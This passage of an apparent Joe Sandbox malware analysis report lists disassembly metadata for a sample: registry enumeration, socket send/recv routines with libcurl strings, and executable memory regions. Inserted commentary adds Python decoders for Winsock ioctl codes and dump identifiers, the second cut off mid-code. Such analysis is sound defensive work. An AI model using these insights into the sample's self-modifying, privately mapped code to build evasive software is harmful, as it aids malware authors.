                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: f111f5e77b476fdf6628b6d778f70d7f9df8ef1e1ad9d4e29791a78c741a2266
                                                              • Instruction ID: f5a9cdab628edf1ccaa89573a9938363f2c57c0861e2338099222c40f29a7fd4
                                                              • Opcode Fuzzy Hash: f111f5e77b476fdf6628b6d778f70d7f9df8ef1e1ad9d4e29791a78c741a2266
                                                              • Instruction Fuzzy Hash: F6B1AE70604706AFDB10CF24C985FA6BBA5AF45318F188A2DE85A4B2D2DB71EC44D772

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1458 d92f17-d92f8c call 12198f0 call 1219ce0 1463 d931c9-d931cd 1458->1463 1464 d92f91-d92ff4 call d91619 RegOpenKeyExA 1463->1464 1465 d931d3-d931d6 1463->1465 1468 d92ffa-d9300b 1464->1468 1469 d931c5 1464->1469 1470 d9315c-d931ac RegEnumKeyExA 1468->1470 1469->1463 1471 d93010-d93083 call d91619 RegOpenKeyExA 1470->1471 1472 d931b2-d931c2 1470->1472 1476 d93089-d930d4 RegQueryValueExA 1471->1476 1477 d9314e-d93152 1471->1477 1472->1469 1478 d9313b-d9314b RegCloseKey 1476->1478 1479 d930d6-d93137 call 1219bc0 call 1219c50 call 1219ce0 call 1219af0 call 1219ce0 call 1218050 1476->1479 1477->1470 1478->1477 1479->1478
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: bced0c0d8990dbd255e9b4865eb638f30e8c305b47cce542355177dc6a27d545
                                                              • Instruction ID: d3ed4f8b5b4deec3d97a56c77d0a810244fbb171f3bb47078c42467137c8fe92
                                                              • Opcode Fuzzy Hash: bced0c0d8990dbd255e9b4865eb638f30e8c305b47cce542355177dc6a27d545
                                                              • Instruction Fuzzy Hash: 5471A3B490431A9FDB50DF69C58479EBBF0BF84308F10899DE898A7354D7749A88CF92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1492 dc9290-dc92ed call d976a0 1495 dc93c3-dc93ce 1492->1495 1496 dc92f3-dc92fb 1492->1496 1503 dc93e5-dc9427 call dad090 call dd4f40 1495->1503 1504 dc93d0-dc93e1 1495->1504 1497 dc93aa-dc93af 1496->1497 1498 dc9301-dc9333 call dad8c0 call dad9a0 1496->1498 1501 dc93b5-dc93bc 1497->1501 1502 dc9456-dc9470 1497->1502 1516 dc9335-dc9364 WSAIoctl 1498->1516 1517 dc93a7 1498->1517 1506 dc93be 1501->1506 1507 dc9429-dc9431 1501->1507 1503->1502 1503->1507 1504->1501 1508 dc93e3 1504->1508 1506->1502 1511 dc9439-dc943f 1507->1511 1512 dc9433-dc9437 1507->1512 1508->1502 1511->1502 1515 dc9441-dc9453 call dd50a0 1511->1515 1512->1502 1512->1511 1515->1502 1520 dc939b-dc93a4 1516->1520 1521 dc9366-dc936f 1516->1521 1517->1497 1520->1517 1521->1520 1524 dc9371-dc9390 setsockopt 1521->1524 1524->1520 1525 dc9392-dc9395 1524->1525 1525->1520
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00DC935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00DC9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 347336affc9af2852e8425a14ad4ea48c3e6561c4a82136ee44298d6ad9df590
                                                              • Instruction ID: 97c702cb7240fbaddcb782fc4a08f07cf3e46ab91130b672888aae10e178a1f1
                                                              • Opcode Fuzzy Hash: 347336affc9af2852e8425a14ad4ea48c3e6561c4a82136ee44298d6ad9df590
                                                              • Instruction Fuzzy Hash: A9510370604346ABDB15DF24C895FAAB7A5FF85314F18852DFD488B382E730E952CBA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1526 d976a0-d976be 1527 d976c0-d976c7 1526->1527 1528 d976e6-d976f2 send 1526->1528 1527->1528 1529 d976c9-d976d1 1527->1529 1530 d9775e-d97762 1528->1530 1531 d976f4-d97709 call d972a0 1528->1531 1532 d9770b-d97759 call d972a0 call d9cb20 call 1118c50 1529->1532 1533 d976d3-d976e4 1529->1533 1531->1530 1532->1530 1533->1531
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,00D93D4E,00000000,?,?,00DA07BF), ref: 00D976EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3388739168
                                                              • Opcode ID: ec795e7be9df8e9cd07eff8a358e75c92862b3a8fc14e7660cc1a5802e671b10
                                                              • Instruction ID: e8d74b6935aa711ca5ec1c708ddcea549e4c3f4a23c6078a619064c9ccc895f9
                                                              • Opcode Fuzzy Hash: ec795e7be9df8e9cd07eff8a358e75c92862b3a8fc14e7660cc1a5802e671b10
                                                              • Instruction Fuzzy Hash: 56113AF5A293447BDA319B559C85E277B9CDFC2B2CF440908F80817355D2619C0482B2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1545 111d1d0-111d281 call 1118d18 1548 111d3b7-111d3c1 1545->1548 1549 111d287-111d28e 1545->1549 1550 111d2da-111d2dd 1549->1550 1551 111d290-111d2a1 1550->1551 1552 111d2df-111d305 1550->1552 1553 111d2a3-111d2aa 1551->1553 1554 111d2ac-111d2b6 1551->1554 1555 111d3b0 1552->1555 1556 111d30b-111d324 1552->1556 1553->1554 1557 111d2bf-111d2c2 1553->1557 1558 111d340-111d347 call 1118c68 1554->1558 1559 111d2bc 1554->1559 1555->1548 1560 111d326-111d332 1556->1560 1561 111d2c9-111d2d4 1557->1561 1580 111d34c 1558->1580 1559->1557 1562 111d334-111d337 1560->1562 1563 111d358-111d35d 1560->1563 1561->1550 1561->1555 1562->1558 1562->1563 1567 111d570-111d576 1562->1567 1568 111d6d3-111d6dc 1562->1568 1569 111d4fc-111d4fe 1562->1569 1570 111d620-111d62a 1562->1570 1571 111d700-111d735 call 111b6a0 1562->1571 1572 111d602-111d604 1562->1572 1573 111d4e4-111d4f7 call 111b640 1562->1573 1574 111d4c6-111d4c8 1562->1574 1575 111d6a6-111d6af 1562->1575 1576 111d5e9-111d5ec 1562->1576 1577 111d4ab-111d4ad 1562->1577 1578 111d5cb-111d5cd 1562->1578 1579 111d5ad-111d5af 1562->1579 1565 111d363-111d366 1563->1565 1566 111daeb-111db00 call 111b640 1563->1566 1565->1566 1583 111d36c-111d36e 1565->1583 1566->1561 1581 111d5f2-111d5fd 1567->1581 1599 111d578-111d57e 1567->1599 1595 111d6e2-111d6fb call 111ca50 1568->1595 1596 111d9de-111d9ee call 111ca50 1568->1596 1589 111d3a0-111d3a4 1569->1589 1597 111d504-111d54f localeconv call 11278b0 1569->1597 1586 111d630-111d643 1570->1586 1587 111d8d2-111d8e7 1570->1587 1571->1561 1584 111dad1-111dad4 1572->1584 1585 111d60a-111d61b 1572->1585 1573->1561 1574->1589 1591 111d4ce-111d4df 1574->1591 1592 111d6b5-111d6ce call 111c9c0 1575->1592 1593 111da4c-111da65 call 111c9c0 1575->1593 1576->1581 1582 111dbbc-111dbdd 1576->1582 1577->1589 1590 111d4b3-111d4c1 1577->1590 1578->1589 1601 111d5d3-111d5e4 1578->1601 1579->1589 1600 111d5b5-111d5c6 1579->1600 
1580->1557 1602 111d3a6-111d3a8 1581->1602 1582->1602 1604 111d374-111d37f 1583->1604 1605 111dadb-111dae6 1583->1605 1584->1566 1609 111dad6 1584->1609 1585->1602 1607 111d649-111d657 1586->1607 1608 111db9c-111db9e 1586->1608 1616 111dba0-111dba2 1587->1616 1617 111d8ed-111d8fd 1587->1617 1589->1602 1590->1602 1591->1602 1592->1561 1593->1561 1595->1561 1620 111d9f3-111d9f7 1596->1620 1640 111d551-111d556 1597->1640 1641 111d55e-111d56b 1597->1641 1618 111db05-111db18 1599->1618 1619 111d584-111d592 1599->1619 1600->1602 1601->1602 1602->1560 1625 111d3ae 1602->1625 1604->1589 1621 111d381-111d389 1604->1621 1623 111d663-111d670 1607->1623 1624 111d659-111d65c 1607->1624 1628 111dba4-111dbb7 call 111b9d0 1608->1628 1609->1605 1616->1628 1630 111d909-111d918 1617->1630 1631 111d8ff-111d902 1617->1631 1618->1602 1632 111dcd8-111dcda 1619->1632 1633 111d598-111d5a8 1619->1633 1620->1561 1636 111db8c-111db97 1621->1636 1637 111d38f-111d39c 1621->1637 1638 111d676-111d687 1623->1638 1639 111dcb9-111dcd3 call 111b9d0 1623->1639 1624->1623 1625->1555 1643 111dc9a-111dcb4 call 111b9d0 1630->1643 1644 111d91e-111d92f 1630->1644 1631->1630 1634 111dcf3-111dd13 1632->1634 1635 111dcdc-111dce7 1632->1635 1633->1602 1634->1602 1635->1634 1636->1602 1637->1589 1646 111db1d-111db26 1638->1646 1647 111d68d-111d6a1 call 111cc90 1638->1647 1639->1620 1640->1641 1641->1602 1643->1639 1650 111dc81-111dc8a 1644->1650 1651 111d935-111d93a 1644->1651 1656 111db5c-111db5f 1646->1656 1647->1620 1650->1643 1655 111d940-111d97a call 111cc90 1651->1655 1651->1656 1655->1620 1656->1650 1658 111db65 1656->1658 1658->1636
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$Inf$NaN
                                                              • API String ID: 0-141429178
                                                              • Opcode ID: 652923d4494de8afebfc7956c3951c2ea3cdc9348b91b034d58bd2a522ea8407
                                                              • Instruction ID: 1aaba57d94b90860293425339d4c16601db11356b64dca2bb82325b560a07254
                                                              • Opcode Fuzzy Hash: 652923d4494de8afebfc7956c3951c2ea3cdc9348b91b034d58bd2a522ea8407
                                                              • Instruction Fuzzy Hash: 2DF1DE7060C3858BDB299F68D0847ABFBE2BB85314F058A2DD9DD87389D7349905CB83

                                                              Control-flow Graph
                                                              • Function d97770-d97832 (rendered graph with executed / not-executed node colouring); calls recv, d972a0, d9cb20, 1118c50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: ba9c73cf9d2b3fde2f505c8db7f80293a5d4a1acb216147ea1d8e1efa3db59ed
                                                              • Instruction ID: 735958cbf9939aaa5c38cd52ac5ec7f81a6cd91be6d356e3556c202c6c787f04
                                                              • Opcode Fuzzy Hash: ba9c73cf9d2b3fde2f505c8db7f80293a5d4a1acb216147ea1d8e1efa3db59ed
                                                              • Instruction Fuzzy Hash: 07110AF5A293547BD630AB559C49E273B9CDBC6F6CF480A18F80C63396D6619C0482F2

                                                              Control-flow Graph
                                                              • Function d975e0-d97699 (rendered graph with executed / not-executed node colouring); calls socket, d972a0, d9cb20, 1118c50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 298a2adcf1a08d6a5628185623e76d781c48df59c2018cc2123fcefe6e9048c2
                                                              • Instruction ID: 52ebeffd080ce476bd607efb0d9f4d01098d3fb8471bce1946c60c9617165e56
                                                              • Opcode Fuzzy Hash: 298a2adcf1a08d6a5628185623e76d781c48df59c2018cc2123fcefe6e9048c2
                                                              • Instruction Fuzzy Hash: 6411C6B5A2425137DB215B2A6C56F9B3B98DB92738F480914F418962E6D2118C5493F2

                                                              Control-flow Graph
                                                              • Function dca150-dca250 (rendered graph with executed / not-executed node colouring); calls getsockname, dcef30, dad090, dd4f40
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00DCA1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00DCA23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 00DCA1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: aa105a616364bad39d30c45a622bfd876c70ff572f04c1b733e4f1704f62213b
                                                              • Instruction ID: 70299f7dbd9c00d736b7a610196617f4e730bf38f2a9f4fe297eb52c9c82ed78
                                                              • Opcode Fuzzy Hash: aa105a616364bad39d30c45a622bfd876c70ff572f04c1b733e4f1704f62213b
                                                              • Instruction Fuzzy Hash: 8B210A31808285BAF7259B58DC42FE7B3BCEF81328F040658F99853151FB32698687F6
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 00DAD65A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: 912b676c618f0e0a482a578617be7631886e40dc6f52d4b056254f953e71ba22
                                                              • Instruction ID: 60e18a5dc7bb8fd1354bd8651fd68ac06bf80539e3f5302bc41531d3fa7df5d9
                                                              • Opcode Fuzzy Hash: 912b676c618f0e0a482a578617be7631886e40dc6f52d4b056254f953e71ba22
                                                              • Instruction Fuzzy Hash: C8012BD0E4538456E721AF38A81736536946B53308F4C186CE88D921DAF769C54CC2B3
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E5AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E5ABE3
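Added example, not part of the Joe Sandbox report or of the sample: the second argument logged for ioctlsocket, 8004667E, is a Winsock request code built with winsock2.h's _IOW macro, and the decoder below shows how to recover its meaning instead of guessing. It also decodes the version word 0202 passed to WSAStartup above. The recv/socket/closesocket format strings on this page ("FD %s:%d socket() = %d", "RECV %s:%d recv(%lu) = %ld", "FD %s:%d sclose(%d)") are consistent with a statically linked libcurl built with memory debugging, so a non-blocking socket set via FIONBIO is what one would expect to see here. The KNOWN_IOCTLS table and the explain_ioctlsocket helper are this example's own names.

```python
# Added example (not from the Joe Sandbox report): decode the request code
# passed to ioctlsocket (8004667E) and the WSAStartup version word (0202).
# Encoding follows winsock2.h's _IOW/_IOR macros; u_long is 4 bytes on Windows.
IOCPARM_MASK = 0x7F          # parameter length is encoded in 7 bits
IOC_VOID = 0x20000000        # no parameters
IOC_OUT = 0x40000000         # data is copied out to the caller
IOC_IN = 0x80000000          # data is copied in from the caller
IOC_INOUT = IOC_IN | IOC_OUT
SIZEOF_ULONG = 4


def _ioc(direction: int, group: str, num: int, size: int) -> int:
    """Mirror of the _IOC-style encoding used by _IOW/_IOR in winsock2.h."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def IOW(group: str, num: int, size: int = SIZEOF_ULONG) -> int:
    return _ioc(IOC_IN, group, num, size)


def IOR(group: str, num: int, size: int = SIZEOF_ULONG) -> int:
    return _ioc(IOC_OUT, group, num, size)


# Example's own lookup table of the three socket ioctls Winsock defines.
KNOWN_IOCTLS = {
    IOW('f', 126): "FIONBIO",     # enable/disable non-blocking mode
    IOR('f', 127): "FIONREAD",    # bytes readable without blocking
    IOR('s', 7): "SIOCATMARK",    # positioned at the OOB mark?
}

_DIRECTION_NAMES = {IOC_IN: "IOC_IN", IOC_OUT: "IOC_OUT",
                    IOC_INOUT: "IOC_INOUT", IOC_VOID: "IOC_VOID"}


def decode_ioctl(code: int) -> dict:
    """Split a request code into direction, parameter size, group char and number."""
    direction = code & (IOC_IN | IOC_OUT | IOC_VOID)
    return {
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "direction": _DIRECTION_NAMES.get(direction, "?"),
        "param_size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


def explain_ioctlsocket(code: int, argp_value: int) -> str:
    """Human-readable reading of an ioctlsocket(s, code, &argp_value) call."""
    d = decode_ioctl(code)
    if d["name"] == "FIONBIO":
        mode = "non-blocking" if argp_value else "blocking"
        return f"socket set to {mode} mode"
    return (f"{d['name']} ({d['direction']}, group {d['group']!r}, "
            f"#{d['number']}, {d['param_size']}-byte arg)")


def winsock_version(word: int) -> tuple:
    """WSAStartup takes MAKEWORD(major, minor): major is the LOW byte."""
    return (word & 0xFF, (word >> 8) & 0xFF)


if __name__ == "__main__":
    # Values taken from the API lines above: ioctlsocket(0, 8004667E, 1), WSAStartup(0202)
    print(hex(IOW('f', 126)), decode_ioctl(0x8004667E))
    print(explain_ioctlsocket(0x8004667E, 1))
    print(winsock_version(0x0202))
```

Reading the page's call with this decoder: 8004667E is IOC_IN, group 'f', number 126 with a 4-byte argument, i.e. FIONBIO, and argp = 1 switches the freshly created socket (the socket call logged just before it) to non-blocking mode.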
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: b6ddf4153055ef8adafcd8db216bd4a2a19d5d4b3e1db3be78c37e212de4b678
                                                              • Instruction ID: 7bf8c36507af3212049a1476b13c0bc8f61373afd679bf70fddedaf904fae84f
                                                              • Opcode Fuzzy Hash: b6ddf4153055ef8adafcd8db216bd4a2a19d5d4b3e1db3be78c37e212de4b678
                                                              • Instruction Fuzzy Hash: CEE1C1706003019BEB20CF14C885B6A77E5FF85319F185E3DED98AB291D775D988CB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7270000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6b85edc51ebdc04fa7d47e098cea6f295b643ea94f6d5e4006a2fc8f83fe2275
                                                              • Instruction ID: d06af01a557ac1106d662d2f0df1bc02000c45f63bc304ccf496d7bcde4f1031
                                                              • Opcode Fuzzy Hash: 6b85edc51ebdc04fa7d47e098cea6f295b643ea94f6d5e4006a2fc8f83fe2275
                                                              • Instruction Fuzzy Hash: FF21E2EB17C124BF622281896B149FA7BAEF9C77307318077F802D2501E7F44A0D9176
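Added example, not part of the Joe Sandbox report: the memory-dump identifiers under "Memory Dump Source" carry the region's page protection and memory type, which is what backs the "changes PE section rights" and "self modifying code" signatures in the overview. The code regions of the main module at 0x00D91000 are tagged 00000040 (PAGE_EXECUTE_READWRITE) inside an 01000000 (MEM_IMAGE) mapping, while the GetLogicalDrives routine above lives in a 07270000 region tagged 00020000 (MEM_PRIVATE) with "based on PE: false", i.e. executable code with no file backing. The decoder below parses the identifiers and flags both cases. The field positions are an assumption drawn from the values on this page (only base address, protection and type are interpreted); the protection and type constants are the documented winnt.h values, and parse_sdmp, triage and SAMPLE_DUMPS are this example's own names.

```python
# Added example (not from the Joe Sandbox report or its author): decode the
# *.sdmp memory-dump identifiers listed under "Memory Dump Source" and flag the
# regions a reverser should open first. Field layout is an ASSUMPTION from the
# values on this page; only base address, protection and type are interpreted.
import re
from dataclasses import dataclass

# Page protection constants from winnt.h
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values from winnt.h
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# ASSUMED layout: slot.stage.id.base.protect.f6.type.f8.sdmp (f6 and f8 are not interpreted)
SDMP_RE = re.compile(
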